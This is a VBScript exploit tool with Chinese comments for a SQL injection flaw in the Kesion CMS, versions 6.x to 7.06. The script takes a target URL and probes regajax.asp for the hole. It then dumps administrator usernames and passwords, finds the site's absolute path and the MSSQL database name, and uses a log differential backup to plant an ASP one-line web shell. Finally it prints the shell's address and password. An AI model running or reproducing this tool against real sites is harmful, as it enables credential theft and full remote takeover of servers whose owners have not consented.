|
科讯kesion 6.x – 7.06 SQL 注射漏洞VBS版利用工具:
'*=========================================================================
'* Intro 科讯kesion 6.x – 7.06 SQL 注射漏洞VBS版利用工具
'* Usage 在命令提示符下输入:Cscript.exe Exp.vbs www.target.com
'* Author 雨中风铃
'* WEB http://hi.baidu.com/yanfei6
'*=========================================================================
Function PostData(PostUrl)
Dim Http
Set Http = CreateObject("msxml2.serverXMLHTTP")
With Http
.Open "GET", PostUrl, False
.Send()
PostData = .ResponseText
End With
Set Http = Nothing
Wscript.Sleep 2000
End Function
Function BackDB(PostUrl)
Dim Http
Set Http = CreateObject("msxml2.serverXMLHTTP")
With Http
.Open "GET", PostUrl, False
.Send()
WScript.Echo "[ " & .Status & " " & .statusText & " ] " & Unescape(Unescape(PostUrl))
If .Status<>200 Then
WScript.Echo "日志差异备份出错!"
WScript.Quit
End If
End With
Set Http = Nothing
Wscript.Sleep 2000
End Function
Function IsSuccess(PostUrl, strSign)
strData = PostData(PostUrl)
'Wscript.Echo strData
if InStr(strData, strSign) >0 then
IsSuccess = True
Else
IsSuccess = False
End If
End Function
Function Encode(strData)
Dim strTemp, I
For I = 1 To Len(strData)
strTemp = strTemp & "%25" & Hex(Asc(Mid(strData, I, 1)))
Next
Encode = strTemp & "%2500"
End Function
Function getData(strData, patrn)
dim strTemp
Set re = New RegExp
re.Pattern = patrn
re.IgnoreCase = True
re.Global = True
Set Matches = re.Execute(strData)
For i = 0 To Matches.Count - 1
If Matches(i).Value<>"" Then
strTemp = strTemp & vbCrLf & Matches(i).SubMatches(0)
End If
Next
getData = strTemp
End Function
If WScript.Arguments.Count <> 1 Then
WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的网址"
WScript.Echo "Example: Cscript.exe Exp.vbs http://www.kesion.com/"
WScript.Quit
End If
attackUrl = WScript.Arguments(0)
attackUrl = Replace(attackUrl,"\","/")
If Right(attackUrl , 1) <> "/" Then
attackUrl = attackUrl & "/"
End If
strHoleUrl = attackUrl & "user/reg/regajax.asp?action=getcityoption&province="
strTestUrl = strHoleUrl & Encode("' union Select 1, 'ExistHole' From KS_Admin")
If IsSuccess(strTestUrl, "ExistHole") Then
WScript.Echo "恭喜!存在漏洞"
Else
WScript.Echo "没有检测到漏洞"
WScript.Quit
End If
strTestUrl = strHoleUrl & Encode("' union Select 1, 'ExistHole'")
If IsSuccess(strTestUrl, "ExistHole") Then
WScript.Echo "数据库为:MSSQL"
bAccess = False
Else
WScript.Echo "数据库为:ACCESS"
bAccess = True
End If
strTestUrl = strHoleUrl & Encode("' union Select top 10 AdminID,UserName+'<->'+PassWord From KS_Admin")
WScript.Echo "用户名<->密码:" & getData(PostData(strTestUrl), "value=""([^""]+)")
strTestUrl = strHoleUrl & "%25i"
strWebPath = getData(PostData(strTestUrl), ">([^>]+)\.\./\.\./KS_Cls/Kesion\.EscapeCls\.asp")
strWebPath = Replace(strWebPath, vbCrLf, "")
If strWebPath <> "" Then
WScript.Echo "网站绝对路径:" & strWebPath
End If
If Not bAccess Then
strTestUrl = strHoleUrl & Encode("' union Select 1, db_name()")
strDatabase = getData(PostData(strTestUrl), "value=""([^""]+)")
strDatabase = Replace(strDatabase, vbCrLf, "")
WScript.Echo "MSSQL数据库名为:" & strDatabase
End If
WScript.Echo "正在进行数据库差异备份:"
If strWebPath <> "" And strDatabase <> "" Then
BackDB(strHoleUrl & Encode("';alter database " & strDatabase & " set RECOVERY FULL"))
BackDB(strHoleUrl & Encode("';create table cmd (a image)"))
BackDB(strHoleUrl & Encode("';backup log " & strDatabase & " to disk = 'c:\cmd' with init"))
BackDB(strHoleUrl & Encode("';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253E)"))
BackDB(strHoleUrl & Encode("';backup log " & strDatabase & " to disk = '" & strWebPath & "2.asp'"))
BackDB(strHoleUrl & Encode("';drop table cmd"))
BackDB(strHoleUrl & Encode("';alter database "& strDatabase & " set RECOVERY SIMPLE"))
End If
WScript.Echo "Execute一句话木马地址为:" & attackUrl & "user/reg/2.asp"
WScript.Echo "密码为:a" | 
